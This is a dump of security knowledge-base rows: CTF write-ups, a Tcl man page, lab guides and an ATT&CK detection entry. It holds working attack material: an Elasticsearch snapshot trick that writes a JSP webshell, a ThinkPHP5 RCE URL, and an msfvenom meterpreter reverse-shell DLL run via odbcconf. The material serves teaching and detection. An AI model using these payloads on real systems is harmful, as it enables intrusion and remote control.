text
stringlengths
100
9.93M
category
stringclasses
11 values
# Hurry up! Wait! Category: Reverse Engineering, 100 points ## Description A binary file was attached. ## Solution Let's open the file with Ghidra. We can see many function names prefixed with "ada". Most are very short, and one stands out: ```c void FUN_0010298a(void) { ada__calendar__delays__delay_for(1000000000000000); FUN_00102616(); FUN_001024aa(); FUN_00102372(); FUN_001025e2(); FUN_00102852(); FUN_00102886(); FUN_001028ba(); FUN_00102922(); FUN_001023a6(); FUN_00102136(); FUN_00102206(); FUN_0010230a(); FUN_00102206(); FUN_0010257a(); FUN_001028ee(); FUN_0010240e(); FUN_001026e6(); FUN_00102782(); FUN_001028ee(); FUN_001023da(); FUN_0010230a(); FUN_0010233e(); FUN_0010226e(); FUN_001022a2(); FUN_001023da(); FUN_001021d2(); FUN_00102956(); return; } ``` The first function seems to add a runtime delay for a very long time. Let's check what the next function does: ```c void FUN_00102616(void) { ada__text_io__put__4(&DAT_00102cd8,&DAT_00102cb8,&DAT_00102cb8,&DAT_00102cd8); return; } ``` There are two different globals referenced here: `DAT_00102cd8` and `DAT_00102cb8`. Each one is referenced twice. What are they? ```assembly DAT_00102cd8 XREF[3]: FUN_00102616:0010261f(*), FUN_00102616:0010262d(*), FUN_00102616:00102636(*) 00102cd8 70 ?? 70h p ; ... DAT_00102cb8 XREF[84]: FUN_00102102:00102112(*), FUN_00102102:00102125(*), FUN_00102206:00102216(*), FUN_00102206:00102229(*), FUN_0010223a:0010224a(*), FUN_0010223a:0010225d(*), FUN_0010230a:0010231a(*), FUN_0010230a:0010232d(*), FUN_0010233e:0010234e(*), FUN_0010240e:0010241e(*), FUN_0010240e:00102431(*), FUN_00102512:00102522(*), FUN_00102512:00102535(*), FUN_00102616:00102626(*), FUN_00102616:00102639(*), FUN_0010271a:0010272a(*), FUN_0010271a:0010273d(*), FUN_0010281e:0010282e(*), FUN_0010281e:00102841(*), FUN_00102922:00102932(*), [more] 00102cb8 01 ?? 01h 00102cb9 00 ?? 00h 00102cba 00 ?? 00h 00102cbb 00 ?? 00h 00102cbc 01 ?? 01h 00102cbd 00 ?? 00h 00102cbe 00 ?? 00h 00102cbf 00 ?? 00h ``` So `DAT_00102cd8` is `p`. What about the next function, `FUN_001024aa`? ```c void FUN_001024aa(void) { ada__text_io__put__4(&DAT_00102cd1,&DAT_00102cb8,&DAT_00102cb8,&DAT_00102cd1); return; } ``` Again, we see the same `DAT_00102cb8` global from the previous function, together with a new global: `DAT_00102cd1`: ```assembly DAT_00102cd1 XREF[3]: FUN_001024aa:001024b3(*), FUN_001024aa:001024c1(*), FUN_001024aa:001024ca(*) 00102cd1 69 ?? 69h i ``` So `DAT_00102cd1` is `i`. This should be enough for us to assume that the first (and last) parameter to `ada__text_io__put__4` is a letter from the flag. We can continue following the functions and taking note of the letter they print, or use the following Ghidra script to do it programmatically: ```python import sys def getAddress(offset): return currentProgram.getAddressFactory().getDefaultAddressSpace().getAddress(offset) listing = currentProgram.getListing() functionManager = currentProgram.getFunctionManager() main_func = getGlobalFunctions("FUN_0010298a")[0] # Iterate the instructions that FUN_0010298a() is composed of for codeUnit in listing.getCodeUnits(main_func.getBody(), True): if not codeUnit.toString().startswith("CALL"): # Ignore anything that isn't a "call" continue callee = functionManager.getFunctionAt(getAddress(str(codeUnit.getAddress(0)))) if not callee.getName().startswith("FUN_"): # In practice - skip ada__calendar__delays__delay_for() continue for cu in listing.getCodeUnits(callee.getBody(), True): # Iterate the instructions that the callee is composed of if (not cu.toString().startswith("LEA RAX")): # Ignore anything that isn't LEA RAX, [addr] # since that's the instruction that loads the flag character to be printed continue # Check what's at "addr" and print it sys.stdout.write(chr(getByte(getAddress(str(cu.getScalar(1)))))) print("") ``` Output: ``` Hurry_up_wait.py> Running... picoCTF{d15a5m_ftw_eab78e4} Hurry_up_wait.py> Finished! ``` The flag: `picoCTF{d15a5m_ftw_eab78e4}`
sec-knowleage
# Faculta Necshevet Identifier v2 Category: Reversing & Binary Exploitation ## Description > After the failure of the previous version, DuckyDebugDuck created a new version which he says is "quack-proof", and even hid a new flag in it! A binary file was attached. ## Solution Let's run the attached file: ```console root@kali:/media/sf_CTFs/technion/Faculta_Necshevet_Identifier_v2# ./facultaNecshevetIdentifier My name is DuckyDebugDuck, what's yours? test Hi test, checking... You're not from a faculta necshevet, you won't get the flag ``` Just like in the [previous challenge](Faculta_Necshevet_Identifier.md), we must enter the correct name in order to be identified as worthy to get the flag. Let's check the decompilation with Ghidra: ```c undefined8 main(void) { int is_equal; char user_input [59]; char expected_name [5]; expected_name._0_4_ = 0x45455754; expected_name[4] = 'T'; printf("My name is DuckyDebugDuck, what\'s yours? "); __isoc99_scanf(&DAT_00102032,user_input); printf("Hi %s, checking...\n",user_input); is_equal = strcmp(expected_name,"QUACK"); if (is_equal == 0) { puts("YOU\'RE FROM A FACULTA NECHSEVET, here\'s the flag: ###############"); } else { puts("You\'re not from a faculta necshevet, you won\'t get the flag"); } return 0; } ``` Again, the program does not limit the user input, allowing us to override variables on the stack: ```assembly DAT_00102032 XREF[1]: main:001011d8(*) 00102032 25 ?? 25h % 00102033 73 ?? 73h s 00102034 00 ?? 00h ``` We need to override `expected_name`, which starts with a value of `TWEET` and needs to be `QUACK` in order for us to read the flag. So, what we'll do is send 59 filler characters to fill up `user_input`, followed by a `QUACK` to override and re-populate `expected_name`: ```console root@kali:/media/sf_CTFs/technion/Faculta_Necshevet_Identifier_v2# python -c "print('a'*59 + b'QUACK')" | nc ctf.cs.technion.ac.il 4006 My name is DuckyDebugDuck, what's yours? Hi aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaQUACK, checking... YOU'RE FROM A FACULTA NECHSEVET, here's the flag: cstechnion{qu4ck_0v3rfl0w} ```
sec-knowleage
'\" '\" Copyright (c) 1993 The Regents of the University of California. '\" Copyright (c) 1994-1997 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: global.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" The definitions below are for supplemental macros used in Tcl/Tk '\" manual entries. '\" '\" .AP type name in/out ?indent? '\" Start paragraph describing an argument to a library procedure. '\" type is type of argument (int, etc.), in/out is either "in", "out", '\" or "in/out" to describe whether procedure reads or modifies arg, '\" and indent is equivalent to second arg of .IP (shouldn't ever be '\" needed; use .AS below instead) '\" '\" .AS ?type? ?name? '\" Give maximum sizes of arguments for setting tab stops. Type and '\" name are examples of largest possible arguments that will be passed '\" to .AP later. If args are omitted, default tab stops are used. '\" '\" .BS '\" Start box enclosure. From here until next .BE, everything will be '\" enclosed in one large box. '\" '\" .BE '\" End of box enclosure. '\" '\" .CS '\" Begin code excerpt. '\" '\" .CE '\" End code excerpt. '\" '\" .VS ?version? ?br? '\" Begin vertical sidebar, for use in marking newly-changed parts '\" of man pages. The first argument is ignored and used for recording '\" the version when the .VS was added, so that the sidebars can be '\" found and removed when they reach a certain age. If another argument '\" is present, then a line break is forced before starting the sidebar. '\" '\" .VE '\" End of vertical sidebar. '\" '\" .DS '\" Begin an indented unfilled display. '\" '\" .DE '\" End of indented unfilled display. '\" '\" .SO '\" Start of list of standard options for a Tk widget. The '\" options follow on successive lines, in four columns separated '\" by tabs. '\" '\" .SE '\" End of list of standard options for a Tk widget. '\" '\" .OP cmdName dbName dbClass '\" Start of description of a specific option. cmdName gives the '\" option's name as specified in the class command, dbName gives '\" the option's name in the option database, and dbClass gives '\" the option's class in the option database. '\" '\" .UL arg1 arg2 '\" Print arg1 underlined, then print arg2 normally. '\" '\" RCS: @(#) $Id: global.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" # Set up traps and other miscellaneous stuff for Tcl/Tk man pages. .if t .wh -1.3i ^B .nr ^l \n(.l .ad b '\" # Start an argument description .de AP .ie !"\\$4"" .TP \\$4 .el \{\ . ie !"\\$2"" .TP \\n()Cu . el .TP 15 .\} .ta \\n()Au \\n()Bu .ie !"\\$3"" \{\ \&\\$1 \\fI\\$2\\fP (\\$3) .\".b .\} .el \{\ .br .ie !"\\$2"" \{\ \&\\$1 \\fI\\$2\\fP .\} .el \{\ \&\\fI\\$1\\fP .\} .\} .. '\" # define tabbing values for .AP .de AS .nr )A 10n .if !"\\$1"" .nr )A \\w'\\$1'u+3n .nr )B \\n()Au+15n .\" .if !"\\$2"" .nr )B \\w'\\$2'u+\\n()Au+3n .nr )C \\n()Bu+\\w'(in/out)'u+2n .. .AS Tcl_Interp Tcl_CreateInterp in/out '\" # BS - start boxed text '\" # ^y = starting y location '\" # ^b = 1 .de BS .br .mk ^y .nr ^b 1u .if n .nf .if n .ti 0 .if n \l'\\n(.lu\(ul' .if n .fi .. '\" # BE - end boxed text (draw box now) .de BE .nf .ti 0 .mk ^t .ie n \l'\\n(^lu\(ul' .el \{\ .\" Draw four-sided box normally, but don't draw top of .\" box if the box started on an earlier page. .ie !\\n(^b-1 \{\ \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul' .\} .el \}\ \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul' .\} .\} .fi .br .nr ^b 0 .. '\" # VS - start vertical sidebar '\" # ^Y = starting y location '\" # ^v = 1 (for troff; for nroff this doesn't matter) .de VS .if !"\\$2"" .br .mk ^Y .ie n 'mc \s12\(br\s0 .el .nr ^v 1u .. '\" # VE - end of vertical sidebar .de VE .ie n 'mc .el \{\ .ev 2 .nf .ti 0 .mk ^t \h'|\\n(^lu+3n'\L'|\\n(^Yu-1v\(bv'\v'\\n(^tu+1v-\\n(^Yu'\h'-|\\n(^lu+3n' .sp -1 .fi .ev .\} .nr ^v 0 .. '\" # Special macro to handle page bottom: finish off current '\" # box/sidebar if in box/sidebar mode, then invoked standard '\" # page bottom macro. .de ^B .ev 2 'ti 0 'nf .mk ^t .if \\n(^b \{\ .\" Draw three-sided box if this is the box's first page, .\" draw two sides but no top otherwise. .ie !\\n(^b-1 \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c .el \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c .\} .if \\n(^v \{\ .nr ^x \\n(^tu+1v-\\n(^Yu \kx\h'-\\nxu'\h'|\\n(^lu+3n'\ky\L'-\\n(^xu'\v'\\n(^xu'\h'|0u'\c .\} .bp 'fi .ev .if \\n(^b \{\ .mk ^y .nr ^b 2 .\} .if \\n(^v \{\ .mk ^Y .\} .. '\" # DS - begin display .de DS .RS .nf .sp .. '\" # DE - end display .de DE .fi .RE .sp .. '\" # SO - start of list of standard options .de SO .SH "STANDARD OPTIONS" .LP .nf .ta 5.5c 11c .ft B .. '\" # SE - end of list of standard options .de SE .fi .ft R .LP See the \\fBoptions\\fR manual entry for details on the standard options. .. '\" # OP - start of full description for a single option .de OP .LP .nf .ta 4c Command-Line Name: \\fB\\$1\\fR Database Name: \\fB\\$2\\fR Database Class: \\fB\\$3\\fR .fi .IP .. '\" # CS - begin code excerpt .de CS .RS .nf .ta .25i .5i .75i 1i .. '\" # CE - end code excerpt .de CE .fi .RE .. .de UL \\$1\l'|0\(ul'\\$2 .. .TH global 3tcl "" Tcl "Tcl Built-In Commands" .BS '\" Note: do not modify the .SH NAME line immediately below! .SH NAME global \- 访问全局变量 .SH "总览 SYNOPSIS" \fBglobal \fIvarname \fR?\fIvarname ...\fR? .BE .SH "描述 DESCRIPTION" .PP 除非正在解释一个 Tcl 过程否则忽略这个命令。如果正在解释一个 Tcl 过程,则它声明这些给定的 \fIvarname\fR 是全局变量而不是局部变量。全局变量是在全局名字空间中的变量。在这个当前过程的持续期间(duration)(并且只有在当前过程中执行的时候),对 \fIvarname\fR 中任何一个的任何引用都将参照(refer to)叫相同名字的全局变量。 .PP Please note that this is done by creating local variables that are linked to the global variables, and therefore that these variables will be listed by \fBinfo locals\fR like all other local variables. .SH "参见 SEE ALSO" namespace(n), upvar(n), variable(n) .SH "关键字 KEYWORDS" global, namespace, procedure, variable .SH "[中文版维护人]" .B 寒蝉退士 .SH "[中文版最新更新]" .B 2001/09/02 .SH "《中国 Linux 论坛 man 手册页翻译计划》:" .BI http://cmpp.linuxforum.net
sec-knowleage
# Elasticsearch写入webshell漏洞(WooYun-2015-110216) 参考文章: http://cb.drops.wiki/bugs/wooyun-2015-0110216.html ## 原理 ElasticSearch具有备份数据的功能,用户可以传入一个路径,让其将数据备份到该路径下,且文件名和后缀都可控。 所以,如果同文件系统下还跑着其他服务,如Tomcat、PHP等,我们可以利用ElasticSearch的备份功能写入一个webshell。 和CVE-2015-5531类似,该漏洞和备份仓库有关。在elasticsearch1.5.1以后,其将备份仓库的根路径限制在配置文件的配置项`path.repo`中,而且如果管理员不配置该选项,则默认不能使用该功能。即使管理员配置了该选项,web路径如果不在该目录下,也无法写入webshell。所以该漏洞影响的ElasticSearch版本是1.5.x以前。 ## 测试环境 编译与启动测试环境: ``` docker compose build docker compose up -d ``` 简单介绍一下本测试环境。本测试环境同时运行了Tomcat和ElasticSearch,Tomcat目录在`/usr/local/tomcat`,web目录是`/usr/local/tomcat/webapps`;ElasticSearch目录在`/usr/share/elasticsearch`。 我们的目标就是利用ElasticSearch,在`/usr/local/tomcat/webapps`目录下写入我们的webshell。 ## 测试流程 首先创建一个恶意索引文档: ``` curl -XPOST http://127.0.0.1:9200/yz.jsp/yz.jsp/1 -d' {"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"} ' ``` 再创建一个恶意的存储库,其中`location`的值即为我要写入的路径。 > 园长:这个Repositories的路径比较有意思,因为他可以写到可以访问到的任意地方,并且如果这个路径不存在的话会自动创建。那也就是说你可以通过文件访问协议创建任意的文件夹。这里我把这个路径指向到了tomcat的web部署目录,因为只要在这个文件夹创建目录Tomcat就会自动创建一个新的应用(文件名为wwwroot的话创建出来的应用名称就是wwwroot了)。 ``` curl -XPUT 'http://127.0.0.1:9200/_snapshot/yz.jsp' -d '{ "type": "fs", "settings": { "location": "/usr/local/tomcat/webapps/wwwroot/", "compress": false } }' ``` 存储库验证并创建: ``` curl -XPUT "http://127.0.0.1:9200/_snapshot/yz.jsp/yz.jsp" -d '{ "indices": "yz.jsp", "ignore_unavailable": "true", "include_global_state": false }' ``` 完成! 访问`http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp`,这就是我们写入的webshell。 该shell的作用是向wwwroot下的test.jsp文件中写入任意字符串,如:`http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=success`,我们再访问/wwwroot/test.jsp就能看到success了: ![](1.png)
sec-knowleage
ftpcount === 显示目前已FTP登入的用户人数 ## 补充说明 显示目前已ftp登入的用户人数。执行这项指令可得知目前用FTP登入系统的人数以及FTP登入人数的上限。 语法: ```shell ftpcount ```
sec-knowleage
version: '2' services: struts2: image: vulhub/struts2:2.3.34-showcase volumes: - ./struts-actionchaining.xml:/usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts-actionchaining.xml ports: - "8080:8080"
sec-knowleage
# T1218-008-win-基于白名单Odbcconf.exe执行Payload ## 来自ATT&CK的描述 可信数字证书签署的二进制文件在Windows操作系统执行时,可通过数字签名验证保护。Windows安装过程中默认安装的一些微软签名的二进制文件可用来代理执行其它文件。攻击者可能会滥用此技术来执行可能绕过应用白名单机制和系统签名验证的恶意文件。该技术考虑了现有技术中尚未考虑的代理执行方法。 ## 测试案例 Odbcconf.exe是允许配置开放数据库连接(ODBC)驱动和数据源名称的Windows工具。攻击者也可能滥用此工具来执行动态链接库,就像带有REGSVR选项的Regsvr32一样。 odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"} 说明:Odbcconf.exe所在路径已被系统添加PATH环境变量中,因此,Odbcconf命令可识别,需注意x86,x64位的Odbcconf调用。 Windows 2003 默认位置: ```dos C:\WINDOWS\system32\odbcconf.exe C:\WINDOWS\SysWOW64\odbcconf.exe ``` Windows 7 默认位置: ```dos C:\Windows\System32\odbcconf.exe C:\Windows\SysWOW64\odbcconf.exe ``` 补充说明:在高版本操作系统中,可以通过配置策略,对进程命令行参数进行记录。日志策略开启方法:`本地计算机策略>计算机配置>管理模板>系统>审核进程创建>在过程创建事件中加入命令行>启用`,同样也可以在不同版本操作系统中部署sysmon,通过sysmon日志进行监控。 ## 检测日志 windows 安全日志(需要自行配置) ## 测试复现 ### 环境准备 攻击机:Kali2019 靶机:windows 7 ### 攻击分析 #### 生成payload.dll ```bash msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.126.146 LPORT=53 -f dll -o payload.dll ``` #### 执行监听 攻击机,注意配置set AutoRunScript migrate f (AutoRunScript是msf中一个强大的自动化的后渗透工具,这里migrate参数是迁移木马到其他进程) ```bash msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.126.146 lhost => 192.168.126.146 msf5 exploit(multi/handler) > set lport 53 lport => 53 msf5 exploit(multi/handler) > set AutoRunScript migrate -f AutoRunScript => migrate -f msf5 exploit(multi/handler) > exploit ``` #### 靶机执行payload ```cmd C:\Windows\SysWOW64\odbcconf.exe /a {regsvr C:\payload.dll} ``` #### 反弹shell ```bash msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.126.146:53 [*] Sending stage (180291 bytes) to 192.168.126.149 [*] Meterpreter session 2 opened (192.168.126.146:53 -> 192.168.126.149:49306) at 2020-04-18 20:45:29 +0800 [*] Session ID 2 (192.168.126.146:53 -> 192.168.126.149:49306) processing AutoRunScript 'migrate -f' [!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate. [!] Example: run post/windows/manage/migrate OPTION=value [...] [*] Current server process: rundll32.exe (912) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3820 [+] Successfully migrated to process meterpreter > getuid Server username: 12306Br0-PC\12306Br0 ``` ## 测试留痕 ```log windows安全日志 事件ID: 4688 进程信息: 新进程 ID: 0xfec 新进程名: C:\Windows\SysWOW64\odbcconf.exe 事件ID:4688 进程信息: 新进程 ID: 0x390 新进程名: C:\Windows\SysWOW64\rundll32.exe sysmon日志 事件ID:1 Image: C:\Windows\SysWOW64\odbcconf.exe FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255) Description: ODBC Driver Configuration Program Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: odbcconf.exe CommandLine: C:\Windows\SysWOW64\odbcconf.exe /a {regsvr C:\payload.dll} CurrentDirectory: C:\ User: 12306Br0-PC\12306Br0 LogonGuid: {bb1f7c32-5fc3-5e99-0000-00201ae20600} LogonId: 0x6e21a TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA1=B1C49B2159C237B1F2BCE2D40508113E39143F7B ParentProcessGuid: {bb1f7c32-f65d-5e9a-0000-0010833eef00} ParentProcessId: 3868 ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: "C:\Windows\system32\cmd.exe" 事件ID:1 Image: C:\Windows\SysWOW64\rundll32.exe FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255) Description: Windows host process (Rundll32) Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: RUNDLL32.EXE CommandLine: rundll32.exe CurrentDirectory: C:\ User: 12306Br0-PC\12306Br0 LogonGuid: {bb1f7c32-5fc3-5e99-0000-00201ae20600} LogonId: 0x6e21a TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA1=8939CF35447B22DD2C6E6F443446ACC1BF986D58 ParentProcessGuid: {bb1f7c32-f662-5e9a-0000-0010d648ef00} ParentProcessId: 4076 ParentImage: C:\Windows\SysWOW64\odbcconf.exe ParentCommandLine: C:\Windows\SysWOW64\odbcconf.exe /a {regsvr C:\payload.dll} ``` ## 检测规则/思路 ### sigma规则 ```yml title: Application Whitelisting Bypass via DLL Loaded by odbcconf.exe description: Detects defence evasion attempt via odbcconf.exe execution to load DLL status: experimental references: - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Odbcconf.yml - https://twitter.com/Hexacorn/status/1187143326673330176 author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community date: 2019/10/25 modified: 2019/11/07 tags: - attack.defense_evasion - attack.execution - attack.t1218 logsource: category: process_creation product: windows detection: selection_1: Image|endswith: '\odbcconf.exe' CommandLine|contains: - '-f' - '/a' - 'regsvr' selection_2: ParentImage|endswith: '\odbcconf.exe' Image|endswith: '\rundll32.exe' condition: selection_1 or selection_2 level: medium falsepositives: - Legitimate use of odbcconf.exe by legitimate user ``` ### 建议 无具体检测规则,可根据进程创建事件4688/1(进程名称、命令行)进行监控。本监控方法需要自行安装配置审核策略Sysmon。 ## 参考推荐 MITRE-ATT&CK-T1218-008 <https://attack.mitre.org/techniques/T1218/008/> windows下基于白名单获取shell的方法整理(下) <http://www.safe6.cn/article/157#directory030494471069429444>
sec-knowleage
# JPG ## 文件结构 - JPEG 是有损压缩格式,将像素信息用 JPEG 保存成文件再读取出来,其中某些像素值会有少许变化。在保存时有个质量参数可在 0 至 100 之间选择,参数越大图片就越保真,但图片的体积也就越大。一般情况下选择 70 或 80 就足够了 - JPEG 没有透明度信息 JPG 基本数据结构为两大类型:「段」和经过压缩编码的图像数据。 | 名 称 | 字节数 | 数据 | 说明 | | ------- | ------ | ---- | ------------------------------------------- | | 段 标识 | 1 | FF | 每个新段的开始标识 | | 段类型 | 1 | | 类型编码(称作标记码) | | 段长 度 | 2 | | 包括段内容和段长度本身,不包括段标识和段类型 | | 段内容 | 2 | | ≤65533字节 | - 有些段没有长度描述也没有内容,只有段标识和段类型。文件头和文件尾均属于这种段。 - 段与段之间无论有多少 `FF` 都是合法的,这些 `FF` 称为「填充字节」,必须被忽略掉。 一些常见的段类型 `0xffd8` 和 `0xffd9`为 JPG 文件的开始结束的标志。 ## 隐写软件 ### [Stegdetect](https://github.com/redNixon/stegdetect) 通过统计分析技术评估 JPEG 文件的 DCT 频率系数的隐写工具, 可以检测到通过 JSteg、JPHide、OutGuess、Invisible Secrets、F5、appendX 和 Camouflage 等这些隐写工具隐藏的信息,并且还具有基于字典暴力破解密码方法提取通过 Jphide、outguess 和 jsteg-shell 方式嵌入的隐藏信息。 ```shell -q 仅显示可能包含隐藏内容的图像。 -n 启用检查JPEG文件头功能,以降低误报率。如果启用,所有带有批注区域的文件将被视为没有被嵌入信息。如果JPEG文件的JFIF标识符中的版本号不是1.1,则禁用OutGuess检测。 -s 修改检测算法的敏感度,该值的默认值为1。检测结果的匹配度与检测算法的敏感度成正比,算法敏感度的值越大,检测出的可疑文件包含敏感信息的可能性越大。 -d 打印带行号的调试信息。 -t 设置要检测哪些隐写工具(默认检测jopi),可设置的选项如下: j 检测图像中的信息是否是用jsteg嵌入的。 o 检测图像中的信息是否是用outguess嵌入的。 p 检测图像中的信息是否是用jphide嵌入的。 i 检测图像中的信息是否是用invisible secrets嵌入的。 ``` ### [JPHS](http://linux01.gwdg.de/~alatham/stego.html) JPEG 图像的信息隐藏软件 JPHS,它是由 Allan Latham 开发设计实现在 Windows 和 Linux 系统平台针对有损压缩 JPEG 文件进行信息加密隐藏和探测提取的工具。软件里面主要包含了两个程序 JPHIDE和 JPSEEK。JPHIDE 程序主要是实现将信息文件加密隐藏到 JPEG 图像功能,而 JPSEEK 程序主要实现从用 JPHIDE 程序加密隐藏得到的 JPEG 图像探测提取信息文件,Windows 版本的 JPHS 里的 JPHSWIN 程序具有图形化操作界面且具备 JPHIDE 和 JPSEEK 的功能。 ### [SilentEye](http://silenteye.v1kings.io/) > SilentEye is a cross-platform application design for an easy use of steganography, in this case hiding messages into pictures or sounds. It provides a pretty nice interface and an easy integration of new steganography algorithm and cryptography process by using a plug-ins system.
sec-knowleage
# ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞 ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。 参考链接: - http://www.thinkphp.cn/topic/60400.html - http://www.thinkphp.cn/topic/60390.html - https://xz.aliyun.com/t/3570 ## 漏洞环境 运行ThinkPHP 5.0.20版本: ``` docker compose up -d ``` 环境启动后,访问`http://your-ip:8080`即可看到ThinkPHP默认启动页面。 ## 漏洞复现 直接访问`http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1`,即可执行phpinfo: ![](1.png)
sec-knowleage
#!/usr/bin/env python # -*- coding: utf-8 -*- # --------------------------------------------------- # Copyright (c) 2013 Pablo Caro. All Rights Reserved. # Pablo Caro <me@pcaro.es> - http://pcaro.es/ # AES.py # --------------------------------------------------- import sys import os.path from AES_base import sbox, isbox, gfp2, gfp3, gfp9, gfp11, gfp13, gfp14, Rcon if sys.version_info[0] == 3: raw_input = input def RotWord(word): return word[1:] + word[0:1] def SubWord(word): return [sbox[byte] for byte in word] def SubBytes(state): return [[sbox[byte] for byte in word] for word in state] def InvSubBytes(state): return [[isbox[byte] for byte in word] for word in state] def ShiftRows(state): Nb = len(state) n = [word[:] for word in state] for i in range(Nb): for j in range(4): n[i][j] = state[(i+j) % Nb][j] return n def InvShiftRows(state): Nb = len(state) n = [word[:] for word in state] for i in range(Nb): for j in range(4): n[i][j] = state[(i-j) % Nb][j] return n def MixColumns(state): Nb = len(state) n = [word[:] for word in state] for i in range(Nb): n[i][0] = (gfp2[state[i][0]] ^ gfp3[state[i][1]] ^ state[i][2] ^ state[i][3]) n[i][1] = (state[i][0] ^ gfp2[state[i][1]] ^ gfp3[state[i][2]] ^ state[i][3]) n[i][2] = (state[i][0] ^ state[i][1] ^ gfp2[state[i][2]] ^ gfp3[state[i][3]]) n[i][3] = (gfp3[state[i][0]] ^ state[i][1] ^ state[i][2] ^ gfp2[state[i][3]]) return n def InvMixColumns(state): Nb = len(state) n = [word[:] for word in state] for i in range(Nb): n[i][0] = (gfp14[state[i][0]] ^ gfp11[state[i][1]] ^ gfp13[state[i][2]] ^ gfp9[state[i][3]]) n[i][1] = (gfp9[state[i][0]] ^ gfp14[state[i][1]] ^ gfp11[state[i][2]] ^ gfp13[state[i][3]]) n[i][2] = (gfp13[state[i][0]] ^ gfp9[state[i][1]] ^ gfp14[state[i][2]] ^ gfp11[state[i][3]]) n[i][3] = (gfp11[state[i][0]] ^ gfp13[state[i][1]] ^ gfp9[state[i][2]] ^ gfp14[state[i][3]]) return n def AddRoundKey(state, key): Nb = len(state) new_state = [[None for j in range(4)] for i in range(Nb)] for i, word in enumerate(state): for j, byte in enumerate(word): new_state[i][j] = byte ^ key[i][j] return new_state
sec-knowleage
--- title: WIZ IAM 挑战赛 Writeup --- <center><h1>WIZ IAM 挑战赛 Writeup</h1></center> --- 最近 WIZ 出了一个云安全相关的 CTF 挑战赛:The Big IAM Challenge,挑战赛地址:[bigiamchallenge.com](https://bigiamchallenge.com/) 自己也尝试做了一下,整个过程还是能学习到很多东西的,下面是我自己答题过程中的一个记录。 <div align=center><img width="700" src="/img/1688698467.png" div align=center/></div> ## 1. Buckets of Fun 第一题是叫 Buckets of Fun,基本上 CTF 的第一题都是送分题,这里也不例外。 题目中给出了一个 Bucket 的 Policy 内容如下: ```json { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": "*", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*" }, { "Effect": "Allow", "Principal": "*", "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b", "Condition": { "StringLike": { "s3:prefix": "files/*" } } } ] } ``` 从策略里可以看到,这个存储桶具有公开列对象和公开读取的权限,由于题目里已经给出了 Bucket 名称,我们拼接下完整的 URL 为:[https://thebigiamchallenge-storage-9979f4b.s3.amazonaws.com](https://thebigiamchallenge-storage-9979f4b.s3.amazonaws.com/) 直接访问这个地址,就可以看到 FLAG 所对应的 Key <img width="900" src="/img/1688698501.png"></br> 访问这个 Key 即可得到 FLAG 内容。 <img width="900" src="/img/1688698538.png"></br> 这个题目可以告诉我们,对于存储桶应该避免允许公开访问以及避免允许公开列对象,防止敏感信息遭到泄露。 ## 2. Google Analytics 第二题叫 ~~Google~~ Analytics,给出的 Policy 如下: ```json { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": "*", "Action": [ "sqs:SendMessage", "sqs:ReceiveMessage" ], "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2" } ] } ``` 这个 Policy 授予了所有人拥有这个 SQS 队列的发送、接收消息的权限。 SQS (Simple Queue Service) 可以用来帮助不同的应用程序之间进行可靠的消息传递,它就像是一个消息中转站,可以把消息从一个地方发送到另一个地方,确保消息的安全送达和处理,让应用程序之间更好地进行通信和协作。 根据官方文档,要调用 Receive Message 接口,需要知道 Queue URL,Queue URL 的主要构成部分就是 Account ID 和 Queue,在题目的 Policy 中给出了 Account ID 和 Queue 的值,那么我们就可以构造这个 Queue URL 了,构造后的 Queue URL 